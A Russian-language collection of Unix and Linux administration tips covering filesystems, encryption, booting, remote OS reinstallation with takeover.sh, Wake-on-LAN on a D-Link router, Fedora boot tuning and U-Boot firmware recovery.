Замораживаем операции в ФС xfs_freeze -f /var/CommuniGate Создаем снапшот раздела /var/CommuniGate lvcreate -l 500 -s -n snap /dev/cgpro/prod Монтируем снапшот. mount -o nouuid,ro /dev/mapper/cgpro-snap /var/CGPro-Snap Размораживаем раздел xfs_freeze -u /var/CommuniGate Производим резервное копирование снапшота ..... Размонтируем и удаляем снапшот. unmount /var/CGPro-Snap lvremove -f /dev/cgpro/snap

Создание файловой системы в файле под Linux (доп. ссылка 1) [обсудить]

Без шифрования: dd if=/dev/zero of=disk-image count=40960 /sbin/mkfs -t ext3 -q disk-image mount -o loop=/dev/loop0 disk-image fs .....работа с разделом losetup -d /dev/loop0 С шифрованием: modprobe loop modprobe cryptoloop modprobe aes dd if=/dev/urandom of=disk-aes count=102400 losetup -e aes /dev/loop1 ./disk-aes mkfs -t reiserfs /dev/loop1 mount -o loop,encryption=aes,acl ./disk-aes /fs ....работа с разделом losetup -d /dev/loop0

Как осуществить разбивку диска в FreeBSD Автор: lavr [комментарии]

Создать freebsd слайс и прописать стандартный загрузчик: fdisk -BI -v -b /boot/mbr ad0 disklabel -w -r -B -b /boot/boot1 -s /boot/boot2 ad0s1 auto или проще disklabel -w -B ad0s1 auto Затем руками отредактировать разбивку: disklabel -e -r ad0s1 с нужными размерами newfs , затем "tunefs -n enable раздел" если нужно softupdate

Как включить поддержку ACL в UFS2 FreeBSD 5 (доп. ссылка 1) [комментарии]

В single mode: "/sbin/tunefs -a enable /fs" Пересобираем ядро с "options UFS_ACL" getfacl - просмотр ACL setfacl - установка ACL Например: setfacl -m user:nobody:rw-,group:wheel:rw- acl-test

Чем хороши LVM, ext3, reiserfs и xfs (доп. ссылка 1) Автор: Денис Смирнов [комментарии]

LVM - позволяет гибко создавать, удалять и изменять размеры разделов без потери данных. ext3 - расширение ext2 для журналирования. Поддерживает журналирование данных, а не только метаданных (при data=journal). reiserfs - высокая скорость работы с каталогами с большим числом файлов, компактно хранит хвосты от файлов, поддерживает увеличение размера раздела без остановки сервера. xfs - быстрая работа с файлами большого размера, великолепная надёжность, поддержка ACL.

Как настроить работу шифрованной файловой системы в Linux (доп. ссылка 1) [комментарии]

1. Устанавливаем патчи cryptoapi и cryptoloop http://www.kernel.org/pub/linux/kernel/crypto/ 2. dd if=/dev/zero of=/usr/testfs bs=1M count=50 3. modprobe cryptoloop; modprobe cryptoapi; modprobe cipher-des 4. losetup -e des /dev/loop0 /usr/testfs 5. mkfs -t ext3 /dev/loop0 6. mount -t ext3 /dev/loop0 /mnt/testfs

Переход на журналируемую файловую систему Reiserfs [комментарии]

- Включаем поддержку Reiserfs в ядре. - Устанавливаем reiserfsprogs-3.x.0j.tar.gz - Cоздаем бут дискету (mkbootdisk --device /dev/fd0 2.4.13; lilo -C /etc/lilo.flop) - Грузимся с дискеты указав в Lilo приглашении "linux root=/dev/hd init=/bin/bash" - mkreiserfs /dev/hda1 - mount -t reiserfs /dev/had1 /

Как перейти в Linux на файловую систему ext3 (доп. ссылка 1) [комментарии]

Выкачиваем и накладываем ext3 патчи (ftp://ftp.kernel.org/pub/linux/kernel/people/sct/ext3/) и утилиты (ftp://download.sourceforge.net/pub/sourceforge/e2fsprogs/). Преобразуем ext2 FS в ext3 (для отмонтированного раздела hda1): tune2fs -j /dev/hda1 Обратное преобразование (из ext3 в ext2): tune2fs -O ^has_journal /dev/hda1 fsck.ext2 -f /dev/hdaX Для форматирование нового ext3 раздела: mke2fs -j /dev/hda1 Как обновить версию журнала: mount /dev/hdaX /mnt -o journal=update

Как включить Soft-updates в FreeBSD для увеличения производительности [комментарии]

1. Перейти в single режим 2. Убедится, что раздел диска размонтирован. 3. tunefs -n enable раздел (например, tunefs -n enable /usr )

Как узнать подробную информацию о EX2FS, размер блоков, системные данные и т.д. [обсудить]

общие данные из суперблока - dumpe2fs -h /dev/раздел информацию о каждом блоке - dumpe2fs /dev/раздел Для FreeBSD нужно использовать dumpfs.

Загрузка, однопользовательский режим

Как загрузиться в однопользовательский режим (single mode) [комментарии]

FreeBSD: boot -s Solaris: stop+a bo: boot -s Linux: left-alt для lilo boot: linux -b rw sushell=/sbin/sash single (можно init=/bin/sh) UnixWare: Во время загрузки пробел [boot] INITSTATE=s go

Создание шифрованных образов виртуальных машин (доп. ссылка 1) (доп. ссылка 2) [комментарии]

Инструкция по созданию полностью зашифрованного образа гостевой системы, в котором шифрование охватывает корневой раздел и стадию загрузки. Извлекаем содержимое корневого раздела образа виртуальной машины, который требуется зашифровать, в tar-архив vm_root.tar. Проверяем, чтобы в образе были необходимые для шифрования и EFI-загрузки разделов утилиты, такие как cryptodisk и grub-efi. Создаём файл с дисковым образом, содержащим два раздела - небольшой раздел для EFI (p1, 100МБ) и корневой раздел, содержимое которого будет зашифровано (p2). truncate -s 4GB disk.img parted disk.img mklabel gpt parted disk.img mkpart primary 1Mib 100Mib parted disk.img mkpart primary 100Mib 100% parted disk.img set 1 esp on parted disk.img set 1 boot on Настраиваем EFI на первом разделе и дисковое шифрование LUKS на втором. Для повышения защищённости можно заполнить шифрованный раздел случайными числами, но это приведёт к увеличению размера итогового образа qcow2. Создаём на шифрованном разделе ФС Ext4. привязываем образ к loop-устройству losetup -P -f disk.img определяем имя созданного устройства (/dev/loopN), в дальнейшем используем переменную $l вместо устройства l=($(losetup -l|grep disk.img)) создаём раздел с EFI, используем VFAT mkfs.vfat ${l}p1 определяем UUID раздела EFI blkid ${l}p1 создаём шифрованный раздел, в процессе задаём временный пароль для расшифровки cryptsetup --type luks1 luksFormat ${l}p2 определяем UUID шифрованного раздела blkid ${l}p2 активируем шифрованный раздел и создаём на нём ФС ext4 cryptsetup luksOpen ${l}p2 cr_root mkfs.ext4 /dev/mapper/cr_root монтируем раздел, копируем в него содержимое tar-архива с начинкой корневого раздела и создаём каталоги для точек монтирования /run, /sys, /proc и /dev. mount /dev/mapper/cr_root /mnt tar -C /mnt -xpf vm_root.tar for m in run sys proc dev; do mount --bind /$m /mnt/$m; done входим в окружение созданного корневого раздела chroot /mnt В /etc/fstab определяем метку корневого раздела (/dev/disk/cr_root) и раздела EFI (/boot/efi). Настраиваем и устанавливаем загрузчик GRUB (в некоторых дистрибутивах вместо /boot/grub используется /boot/grub2, а вместо префикса "grub" - "grub2-"): echo "GRUB_ENABLE_CRYPTODISK=y" >> /etc/default/grub mount /boot/efi grub-install --removable --target=x86_64-efi grub-mkconfig -o /boot/grub/grub.cfg Для систем с mkinitramfs (Debian) дополнительно нужно добавить параметры шифрованного раздела в /etc/crypttab: cr_root UUID=<uuid> luks none После чего пересоздаём образ ram-диска с компонентами для начальной загрузки. Для систем с dracut требуется изменить настройки /etc/default/grub, указав в GRUB_CMDLINE_LINUX привязку rd.luks.uuid=<UUID>. Для дистрибутивов с SELinux также нужно обновить метки (relabel). Отмонтируем созданные в процессе подготовки образа разделы из /mnt и пытаемся загрузить образ, используя режим EFI. В процессе загрузки вводим заданный ранее временный пароль и проверяем работоспособность окружения. Заменяем временный пароль на ключ для быстрой загрузки и настраиваем ram-диск для его использования. Для образа, примонтированного через /dev/sda: dd if=/dev/urandom bs=1 count=33|base64 -w 0 > /etc/cryptsetup-keys.d/luks-<UUID>.key chmod 600 /etc/cryptsetup-keys.d/luks-<UUID>.key cryptsetup --key-slot 1 luksAddKey /dev/sda2 # первичный ключ для восстановления cryptsetup --key-slot 0 luksRemoveKey /dev/sda2 # удаляем временный ключ cryptsetup --key-slot 0 --iter-time 1 luksAddKey /dev/sda2 /etc/cryptsetup-keys.d/luks-<UUID>.key Указание опции "-w 0" в dd необходимо для того, чтобы исключить появление в пароле символа перевода строки. Для систем с mkinitramfs теперь нужно изменить настройки /etc/crypttab, указав путь к сгенерированному ключу: cr_root UUID=<UUID> /etc/cryptsetup-keys.d/luks-<UUID>.key luks Для систем с dracut необходимо добавить hook ключа в /etc/dracut.conf.d, а для Debian также потребуется указать маску определения файла с ключом: cryptodisk.conf install_items+=" /etc/cryptsetup-keys.d/* " echo "KEYFILE_PATTERN=\"/etc/cryptsetup-keys.d/*\"" >>/etc/cryptsetup-initramfs/conf-hook Теперь можно перегенерировать образ RAM-диска начальной загрузки. После попытки загрузки пароль будет спрошен один раз только на стадии запуска GRUB и на последующих стадиях загрузки запрашиваться не будет.

Монтирование корневой ФС в RO-режиме при загрузке в свежих версиях Fedora (доп. ссылка 1) Автор: Artem S. Tashkinov [комментарии]

Для монтирования корневой файловой системы (root) в режиме только для чтения при загрузке в свежих версиях Fedora в опции ядра нужно добавить: rd.break=pre-mount init=/usr/bin/bash Просто указания передачи ядру параметров "1 ro" недостаточно, так как systemd игнорирует "ro". Параметр "rd.break=pre-mount" прервёт процесс загрузки перед монтированием корневой ФС и позволит выполнить любые проверки ФС на стадии до монтирования.

Удалённая замена одного Linux-дистрибутива на другой по SSH (доп. ссылка 1) (доп. ссылка 2) [комментарии]

Для решения задачи полной переустановки Linux-дистрибутива на удалённом сервере, к которому имеется только доступ по SSH, подготовлен скрипт takeover.sh. Скрипт создаёт минималистичное рабочее окружение в памяти, состоящее из инструментария busybox и простейшего init-процесса. Подключившись по SSH к данному окружению можно провести переустановку с отмонтированием корневого раздела. В том числе можно выполнить операции полной очистки всех данных или переразбить дисковые разделы. Скрипт обеспечивает только создание окружения, непосредственно операции по переустановке выполняются вручную, после соединения к созданному окружению по SSH. Скрипт перемонтирует корневой раздел, но не трогает данные, поэтому в случае если что-то пошло не так и вручную не были произведены необратимые изменения для возврата к исходному состоянию достаточно перезагрузить сервер. После завершения установки новой ОС для выхода из созданного окружения и загрузки новой системы достаточно инициировать перезагрузку. Перед выполнением операции на реальном внешнем сервере рекомендуется провести тестовую переустановку с использованием виртуальной машины. Порядок операций: Создадим директорию с окружением для запуска скрипта (/takeover) и примонтируем к ней раздел tmpfs для хранения нового раздела в оперативной памяти: mount -t tmpfs none /takeover Скопируем в директорию рабочее окружение одного из минималистичных дистрибутивов для восстановления после сбоев, например, SystemRescueCD. После копирования убедимся, что окружение работоспособно при помощи команды: chroot /takeover /bin/sh Скопируем в корень созданного окружения статически собранный вариант пакета busybox (/takeover/busybox) и проверим его работоспособность: /takeover/busybox sh Скопируем в окружение скрипт takeover.sh и простейший init-процесс fakeinit, предварительно скомпилировав его из файла fakeinit.c: gcc -static ./fakeinit.c -o ./fakeinit Отключаем по возможности все сервисы на переустанавливаемом сервере, убиваем процесс cron и завершаем работу http-сервера (скрипт по умолчанию открывает новый SSH-вход на 80 порту (на 22 порту пока висит старый SSH), поэтому важно, чтобы на этом порту не было обработчиков). Запускаем /takeover/takeover.sh и выполняем предложенные действия (задаём пароль входа и соглашаемся с продолжением выполнения операции). Далее заходим в новое окружение по SSH: ssh -p 80 root@my_host После входа удаляем все оставшиеся фоновые процессы старой системы и отмонтируем все разделы старой системы из директории /old_root, после чего отмонтируем корень старой системы (/old_root). Предварительно копируем в текущее окружение набор модулей ядра от старой системы /old_root/lib/modules, на случае если они понадобятся в процессе замены старой системы. Выполняем операции по замене системы, не забываем отмонтировать дисковые разделы. После завершения работы перезагужаем систему reboot -f или echo b > /proc/sysrq-trigger Скрипт takeover.sh: #!/bin/sh set -e TO=/takeover OLD_TELINIT=/sbin/telinit PORT=80 cd "$TO" if [ ! -e fakeinit ]; then ./busybox echo "Please compile fakeinit.c first" exit 1 fi ./busybox echo "Please set a root password for sshd" ./busybox chroot . /bin/passwd ./busybox echo "Setting up target filesystem..." ./busybox rm -f etc/mtab ./busybox ln -s /proc/mounts etc/mtab ./busybox mkdir -p old_root ./busybox echo "Mounting pseudo-filesystems..." ./busybox mount -t tmpfs tmp tmp ./busybox mount -t proc proc proc ./busybox mount -t sysfs sys sys if ! ./busybox mount -t devtmpfs dev dev; then ./busybox mount -t tmpfs dev dev ./busybox cp -a /dev/* dev/ ./busybox rm -rf dev/pts ./busybox mkdir dev/pts fi ./busybox mount -t devpts devpts dev/pts TTY="$(./busybox tty)" ./busybox echo "Checking and switching TTY..." exec <"$TO/$TTY" >"$TO/$TTY" 2>"$TO/$TTY" ./busybox echo "Type 'OK' to continue" ./busybox echo -n "> " read a if [ "$a" != "OK" ] ; then exit 1 fi ./busybox echo "Preparing init..." ./busybox cp $OLD_TELINIT tmp/telinit ./busybox cat >tmp/init <<EOF #!${TO}/busybox sh exec <"${TO}/${TTY}" >"${TO}/${TTY}" 2>"${TO}/${TTY}" cd "${TO}" ./busybox echo "Init takeover successful" ./busybox echo "Pivoting root..." ./busybox pivot_root . old_root ./busybox echo "Chrooting and running init..." exec ./busybox chroot . /fakeinit EOF ./busybox chmod +x tmp/init ./busybox echo "Starting secondary sshd" ./busybox chroot . /usr/bin/ssh-keygen -A ./busybox chroot . /usr/sbin/sshd -p $PORT ./busybox echo "You should SSH into the secondary sshd now." ./busybox echo "Type OK to continue" ./busybox echo -n "> " read a if [ "$a" != "OK" ] ; then exit 1 fi ./busybox echo "About to take over init. This script will now pause for a few seconds." ./busybox echo "If the takeover was successful, you will see output from the new init." ./busybox echo "You may then kill the remnants of this session and any remaining" ./busybox echo "processes from your new SSH session, and umount the old root filesystem." ./busybox mount --bind tmp /sbin ./tmp/telinit u ./busybox sleep 10 init-процесс fakeinit.c #define _XOPEN_SOURCE 700 #include <signal.h> #include <unistd.h> #include <sys/wait.h> int main() { sigset_t set; int status, i; for (i = 0; i < 64; i++) close(i); if (getpid() != 1) return 1; sigfillset(&set); sigprocmask(SIG_BLOCK, &set, 0); for (;;) wait(&status); }

Настройка двойной загрузки Ubuntu и Windows 10 Автор: Oleg Popov [комментарии]

Имеется ноутбук с SSD-накопителем (/dev/sdb) и жестким диском (/dev/sda). На SSD установлена ОС Windows 10. Задача: Разделить SSD на две части и установить во второй раздел Ubuntu, организовав двойную загрузку с Windows. Несмотря на кажущуюся простоту решения, имеется несколько важных подводных камней. 1. Отключаем в BIOS UEFI Secure Boot и Fast Boot, загрузку с UEFI оставляем. 2. Загружаемся в Windows, запускаем утилиту diskmgmt.msc, уменьшаем размер Windows-раздела на SSD и создаём все необходимые разделы, включая разбивку жесткого диска. Разделы создаём без ФС и привязки букв в режиме RAW. Это принципиально важный шаг, разбивку диска нужно делать именно в Windows, если разбить разделы во время установки Ubuntu, то первая же загрузка в Windows после установки Ubuntu повредит содержимое разделов Linux, так как Windows кэширует старые параметры разделов. 3. Во время установки выбираем ручную разбивку диска, привязываем точки монтирования /, /home и т.п, устанавливаем флаг форматирования. Для раздела с файлами UEFI (обычно fat32-раздел вначале диска 100-200 Мб) явно устанавливаем тип "efi", если этого не сделать, то после установки будет выведена ошибка о невозможности установить загрузчик grub. 4. Если в результате в загрузочном меню Grub присутствует только Ubuntu, а Windows не появился (в моём случае загрузчик Windows был на диске /dev/sdb1, а EFI-раздел с загрузчиком на /dev/sda1), то загрузившись в Ubuntu можно запустить утилиту boot-repair, которая автоматизирует решение большинства проблем с загрузкой: sudo add-apt-repository ppa:yannubuntu/boot-repair sudo apt-get update sudo apt-get install boot-repair sudo boot-repair

Пробуждение компьютера по сети с помощью D-Link DIR 300 (320) NRU Автор: jPump [комментарии]

Задача: Осуществить возможность пробуждения (Wake on Lan) из интернета удаленного компьютера, находящегося дома за роутером марки D-Link (DIR-300, DIR-320). Решение: Использование команды ip, имеющейся в стандартных сборках BusyBox'a в роутерах D-Link. Предисловие: Дома стоит роутер D-Link DIR-320/NRU ревизии B1, а до этого был DIR-300/NRU ревизии B5, для которых (на данный момент) нет альтернативных готовых прошивок (в том числе и горячо всеми любимой DD-WRT). На роутере стоит BusyBox 1.12. Проблема состояла в том, что встроенное в веб-интерфейс средство переброса пакетов не позволяют переадресацию в широковещательный канал - broadcast (x.x.x.255), а хитровыделанный D-Link обновляет arp-таблицу каждые 15-30 секунд, так что непосредственно в выключенный длительное время компьютер Magic Packet тоже не перебросить. Тайваньские ребята решили отказаться от компиляции arp, sudo и прочих печенюшек в BusyBox, поскольку iptables тоже не позволяет POSTROUTING на широковещательный канал. Решение после недели напряженного поиска было найдено случайно на ныне почившем форуме сборки линукса для старых компьютеров под роутер. Пример: Для начала настройте BIOS вашей материнской платы (в разделе настроек питания есть пункт о пробуждении из выключенного состояния) и вашей сетевой карты (уже из операционной системы в свойствах карты). Для проверки выключите компьютер и посмотрите, если индикация сетевого разъема мигает, значит все в порядке. 1. Подключаемся telnet-ом к роутеру (логин и пароль те же, что и для веб-интерфейса): Dlink-Router login: admin Password: Welcome to _______ ___ __ ____ _ _ ___ | ___ \\ | | |__|| \\ | || | / / | | | || ___ | |__ __ | \\| || |/ / | |___| || |___| | || || |\\ || \\ |_______/ |______||__||_| \\____||_|\\___\\ = Ebuilding Networks for People = BusyBox v1.12.1 (2011-05-13 14:42:48 MSD) built-in shell (ash) Enter 'help' for a list of built-in commands. # 2. Если компьютер в данный момент присоединен к роутеру, то ищем его mac-адрес, набираем: # ip neigh show <Внешний_ip> dev eth2.5 lladdr 01:23:45:67:AB:CD DELAY ! Внешний адрес 192.168.0.50 dev br0 lladdr 11:22:33:44:55:66 REACHABLE ! Настольный компьютер 192.168.0.90 dev br0 lladdr 77:88:99:00:AA:BB REACHABLE ! Ноутбук 3. Поскольку в данный момент уже уже есть запись для нашего mac-адреса, то мы не добавляем, а просто изменяем текущую: # ip neigh change 192.168.0.50 lladdr 11:22:33:44:55:66 nud permanent dev br0 4. Смотрим результат, снова набираем: # ip neigh show <Внешний_ip> dev eth2.5 lladdr 01:23:45:67:AB:CD DELAY ! Внешний адрес 192.168.0.50 dev br0 lladdr 11:22:33:44:55:66 PERMANENT ! Настольный компьютер 192.168.0.90 dev br0 lladdr 77:88:99:00:AA:BB REACHABLE ! Ноутбук После этого уже заходим на веб-интерфейс нашего роутера и в разделе "межсетевой экран" в пункте "Виртуальные серверы" добавляем проброс 9 (или 7, в зависимости от вашей сетевой карты) порта роутера на порт ip вашего компьютера. Послесловие: Совет: настройте через веб-интрефейс роутера DHCP для mac'а вашего компьютера статический IP (по умолчанию DIR-300(320)/NRU выдает их в диапазоне от 192.168.0.2 - 192.168.0.100) Дополнительные ссылки:
Немного о линуксовых командах в пределах BusyBox: http://noted.org.ua/1727
Чуть подробнее про команду ip: http://linux-ip.net/html/tools-ip-neighbor.html
Для проверки работоспособности можно воспользоваться сайтом: http://wakeonlan.me/
Особая благодарность русскоязычному форуму D-Link'a, оказавшую неоценимую помощь и моральную поддержку: 1, 2, 3

Сокращение времени загрузки Fedora 17 c 15 до 3 секунд (доп. ссылка 1) [комментарии]

Изложенные в данной статье инструкции позволяют сократить до трёх секунд загрузку дистрибутива Fedora 17 с NetworkManager до экрана приглашения входа в систему от GDM. Указанная конфигурация опробована на ноутбуке Lenovo T420s (2x2x Intel Core i5-2540M CPU @ 2.60GHz) и SSD-накопителем Intel SSDSA2BW160G3L. 1. Используем простейшую конфигурацию разбиения диска с загрузочным и рабочим разделами с файловой системой Ext4: sda1 ext4 /boot sda2 swap sda3 ext4 / После установки дистрибутива потребуется как минимум две перезагрузки для достижения оптимального времени загрузки из-за необходимости адаптации к загрузочной последовательности механизма readahead (вначале readahead собирает информацию о загружаемых программах и библиотеках, после чего начнёт разом загружать компоненты в кэш страниц памяти). Обновляем все пакеты, активируем prelink и устанавливаем пакет systemd-analyze: sudo yum update sudo /etc/cron.daily/prelink sudo yum install systemd-analyze После перезагрузки выполняем: sudo systemd-analyze Startup finished in 1413ms (kernel) + 2911ms (initramfs) + 10593ms (userspace) = 14918ms Как видим в штатном режиме дистрибутив загрузился за 15 секунд. Начинаем оптимизацию. Отключаем initramfs - так как в ядро встроена поддержка файловой системы ext4, поэтому для монтирования корневого раздела не требуется загрузка дополнительных модулей ядра. В параметрах загрузки явно указываем имя корневого раздела (без UUID) и тип ФС. Содержимое /etc/grub2.cfg должно выглядеть примерно так: linux /vmlinuz-3.3.7-1.fc17.x86_64 root=/dev/sda3 rootfstype=ext4 quiet libahci.ignore_sss=1 raid=noautodetect # initrd /initramfs-3.3.7-1.fc17.x86_64.img Опции "raid=noautodetect" и "libahci.ignore_sss=1" позволяют ускорить время инициализации ядра из-за пропуска дополнительных проверок. После перезагрузки systemd-analyze показывает сокращение времени до 14684ms. Продолжаем оптимизацию. Так как на компьютере не используются LVM, RAID и шифрование можно смело отключить все сервисы fedora-*storage*. Дополнительно можно отключить систему вывода заставки plymouth, так как нам важнее скорость а не эстетическое наслаждение от ожидания завершения загрузки. Для отключения указанных сервисов следует использовать команду "systemctl mask", достоинство которой ещё и в том, что %post скрипт RPM в дальнейшем не включит сервис автоматически. cd /lib/systemd/system for i in fedora*storage* plymouth-*.* lvm2-monitor.* mdmonitor*.*; do sudo systemctl mask $i;done Одновременно отключим лишние SysV-скрипты livesys, livesys-late и spice-vdagentd: for i in livesys livesys-late spice-vdagentd ; do sudo chkconfig $i off;done Перезагружаем систему и наблюдаем через systemd-analyze сокращение времени загрузки до 8197ms Далее переходим к экстремальным действиям и отключаем все сервисы, кроме NetworkManager, поэтому важно запомнить что именно было отключено, так как в результате будет получена система без почты, межсетевого экрана, системы печати, утилит abrt, avahi, некоторых точек монтирования, rsyslog, irqbalance и защиты selinux. cd /lib/systemd/system for i in abrt*.service auditd.service avahi-daemon.* bluetooth.* dev-hugepages.mount dev-mqueue.mount \\ fedora-configure.service fedora-loadmodules.service fedora-readonly.service ip6tables.service \\ iptables.service irqbalance.service mcelog.service rsyslog.service sendmail.service sm-client.service \\ sys-kernel-config.mount sys-kernel-debug.mount; do \\ sudo systemctl mask $i; \\ done Для отключения selinux правим файл /etc/selinux/config и добавляем настройку "selinux=0" в строку с параметрами ядра. Настройки /etc/grub2.cfg принимают примерно такой вид: linux /vmlinuz-3.3.7-1.fc17.x86_64 root=/dev/sda3 rootfstype=ext4 libahci.ignore_sss=1 raid=noautodetect selinux=0 # initrd /initramfs-3.3.7-1.fc17.x86_64.img Перезагружаемся и наблюдаем по systemd-analyze сокращение загрузки до 2926ms. Но идеи по оптимизации пока не исчерпаны. Попробует выжать ещё времени через манипуляции с монтированием разделов. Переводим раздел /boot в режим "монтирование по требованию" и создаём раздел /tmp с использованием tmpfs для сокращения нагрузки на диск в процессе загрузки. В результате /etc/fstab будет выглядеть следующим образом: /dev/sda3 / ext4 defaults 1 1 /dev/sda1 /boot ext4 noauto,comment=systemd.automount 1 2 /dev/sda2 swap swap defaults 0 0 tmpfs /tmp tmpfs defaults 0 0 После перезагрузки systemd-analyze выдаёт 2769ms. Так как NetworkManager запускается также при старте программы входа в систему, можно отключить приводящую к загрузке NetworkManagers зависимость на уровне multi-user, так как он всё равно будет параллельно запущен при запуске gdm, зависимость для которого остаётся. sudo rm /etc/systemd/system/multi-user.target.wants/NetworkManager.service Проверяем время загрузки - 2603ms. Для проверки насколько readahead влияет на время загрузки для эксперимента временно выключим readahead: cd /lib/systemd/system for i in *readahead*; do sudo systemctl mask $i;done После перезагрузки systemd-analyze показывает 2547ms. Но несмотря на сокращение времени загрузки до запуска экрана входа в систему, сам э кран визуально появляется с некоторой задержкой. Для того чтобы более точно оценить время загрузки воспользуемся секундомером. sudo dracut -f Время загрузки с readahead и возвращённым initramfs: systemd-analyze Startup finished in 803ms (kernel) + 2217ms (initramfs) + 1018ms (userspace) = 4039ms При сборке initramfs без plymouth и в режиме только хоста: sudo dracut -f -H -o plymouth получаем: systemd-analyze Startup finished in 612ms (kernel) + 499ms (initramfs) + 1330ms (userspace) = 2443ms Следует иметь в виде, что сервисы отключенные через "systemctl mask" при необходимости можно в любой момент вернуть командой "systemctl unmask".

Как в Ubuntu выполнить действие или остановить программу перед переходом в спящий режим (доп. ссылка 1) [комментарии]

Иногда следует перед выполнение перехода в спящий или ждущий режим выполнить какие-то действия, например, дождаться завершения какого-то процесса или принудительно завершить его. Например, в случае использования инструмента резервного копирования backintime при копировании данных по сети может наблюдаться проблема, вызванная тем, что backintime блокирует переход в спящий режим до завершения выполнения операции, но проверка на запуск backintime осуществляется уже после отключения сетевых интерфейсов, т.е. завершить копирование по сети уже невозможно, что приводит к сбою в работе backintime и невозможности перевести систему в спящий режим. В качестве решения проблемы можно создать простой скрипт, который на начальной стадии перехода в спящий режим дождется завершения выполнения программы. Создаем /etc/pm/sleep.d/01_backintime: #!/bin/bash # Arve Seljebu, may 2010 # check if script parameter is hibernate or suspend case "${1}" in hibernate|suspend) # run loop as long as program /usr/bin/backintime is running while pgrep -f "/usr/bin/backintime "; do sleep 5 done ;; esac # always exit cleanly exit 0 Другой проблемой может стать необходимость отмонтирования вручную подключенных шифрованных или сетевых ФС, например, для отмонтирования encfs-разделов можно использовать скрипт /etc/pm/sleep.d/20_unmount_storage: #!/bin/bash # # Script which unmounts network storage before suspend and hibernate. # # Arve Seljebu. May 2011 PATH=/sbin:/usr/sbin:/bin:/usr/bin # Which mountpoints we want to umount MOUNTPOINT[0]=/media/storage/encfs MOUNTPOINT[1]=/media/storage #MOUNTPOINT[2]=/media/storage2 # User to run from (user who mounted them) USER=username if [ ! -x /bin/mountpoint ]; then echo "Did not find executable /bin/mounpoint" exit 0 fi case "${1}" in hibernate|suspend) for i in "${MOUNTPOINT[@]}" do # check if the mountpoint is mounted echo "Checking if mountpoint $i is mounted..." sudo -u $USER mountpoint $i > /dev/null if [ "$?" == "0" ]; then # try to umount with fusermount, if not succsessful, try with umount echo "Mountpoint $i mounted, umounting..." fusermount -u $i if [ "$?" != "0" ]; then umount $i fi fi done echo "Done..." exit 0 ;; resume|thaw) # nothing ;; esac По аналогии можно создать скрипты и для обработки других ситуаций.

Использование uBoot для восстановления поврежденной прошивки портативных устройств (доп. ссылка 1) [обсудить]

В большом числе основанных на Linux портативных устройств и встраиваемых систем (например, на телефонах на базе платформы Android), используется загрузчик uBoot, который можно использовать для экстренной загрузки прошивки, в случае мертвого зависания аппарата вследствие неудачной перепрошивки. При попытке загрузки с подключенной через последовательный порт консолью, в терминале можно увидеть примерно такую информацию: U-Boot 2010.03-01161-gd91b0a9 (Apr 22 2010 - 03:24:41) Marvell-GuruPlug SoC: Kirkwood 88F6281_A0 DRAM: 512 MB NAND: 512 MiB In: serial Out: serial Err: serial Net: egiga0, egiga1 88E1121 Initialized on egiga0 88E1121 Initialized on egiga1 Hit any key to stop autoboot: 3 При нажатии любой клавиши процесс продолжения загрузки будет прерван и на экране появится приглашение для ввода команд: Marvell>> Для просмотра переменных окружения загрузчика вводим команду printenv: Marvell>> printenv bootcmd=${x_bootcmd_usb}; ${x_bootcmd_kernel}; setenv bootargs ${x_bootargs} ${x_bootargs_root}; bootm 0x6400000; bootdelay=3 baudrate=115200 x_bootcmd_usb=usb start x_bootcmd_kernel=nand read.e 0x6400000 0x100000 0x400000 x_bootargs=console=ttyS0,115200 x_bootargs_root=ubi.mtd=2 root=ubi0:rootfs rootfstype=ubifs ethaddr=02:50:43:16:d0:2b ethact=egiga0 eth1addr=02:50:43:fb:31:71 bootargs=rootwait stdin=serial stdout=serial stderr=serial Environment size: 441/131068 bytes и аккуратно сохраняем где-нибудь выведенные параметры, на всякий случай, чтобы в дальнейшем можно было вернуться к первоначальным настройкам. Изменение переменных окружения производится командой setenv, например, установим IP-адреса для встроенного Ethernet-адаптера: Marvell>> setenv ipaddr 192.168.1.55 Marvell>> setenv serverip 192.168.1.1 Marvell>> setenv netmask 255.255.255.0 Для сохранения изменений во Flash-память необходимо использовать команду saveenv. Введя команду help можно посмотреть список доступных встроенных команд, а введя "help имя_команды", посмотреть краткую справку о заданной команде. Подробнее с командами uBoot можно познакомиться в этом или этом руководстве. Наша задача, организовать для оживления аппарата загрузку ядра и корневой ФС. Нам необходимо найти образ ядра (uImage), необходимых модулей с драйверами (modules.tar.gz), образ ram-диска (initrd) и корневой ФС (rootfs.tar.gz). Как правило данные файлы можно выделить из распространяемых производителем обновлений прошивки или попытаться найти в сети, например, на сайтах http://plugcomputer.org/ или http://sheeva-with-linux.com. Некоторые типы устройств можно восстановить без лишних трудностей, например, для встраиваемых систем Ionics Stratus в uBoot предусмотрена специальная команда для быстрого восстановления прошивки через USB - достаточно скопировать на USB Flash файлы uImage, modules.tar.gz, rootfs.tar.gz и initrd. После чего в приглашении uBoot набрать: run recover2 Для других устройств, таких как Guruplug, восстановление немного сложнее. Копируем на USB Flash файлы uImage и modules.tar.gz, после чего в приглашении uBoot выполняем команды: usb start fatload usb 0 0x00800000 uImage nand erase clean 0x00100000 0x00400000 nand write.e 0x00800000 0x00100000 0x00400000 bootm 0x00800000 0x01100000 После чего перезагружаем устройство, входим под пользователем root и распаковываем содержимое архива modules.tar.gz в корень: cd / tar xvf /mnt/modules.tar.gz uBoot также способен считать ядро и initrd с SD-карты или по сети, используя протокол tftp (tftp-сервер для большинства Linux-дистрибутивов представлен в пакете tftpd). Альтернативным путем восстановления работоспособности устройства является использование готовых инструментариев. Например, программа ESIA предоставляет удобный GUI-интерфейс для восстановления типовых устройств. Для подключения необходимо установить свежую версию программы openocd, которая позволяет задействовать JTAG-интерфейс, подключившись к устройству через последовательный порт. Далее, нужно подгрузить драйвер ftdi_sio, указав корректный идентификатор устройства (можно посмотреть командой lsusb): sudo rmmod ftdi_sio sudo modprobe ftdi_sio vendor=0x1c0c product=0x0102 Если программа ESIA не помогла, можно попробовать скрипты Sheevaplug Installer и GuruPlug Installer.

Использование LTSP для организации работы тонких клиентов (доп. ссылка 1) (доп. ссылка 2) Автор: xenos88 [обсудить]

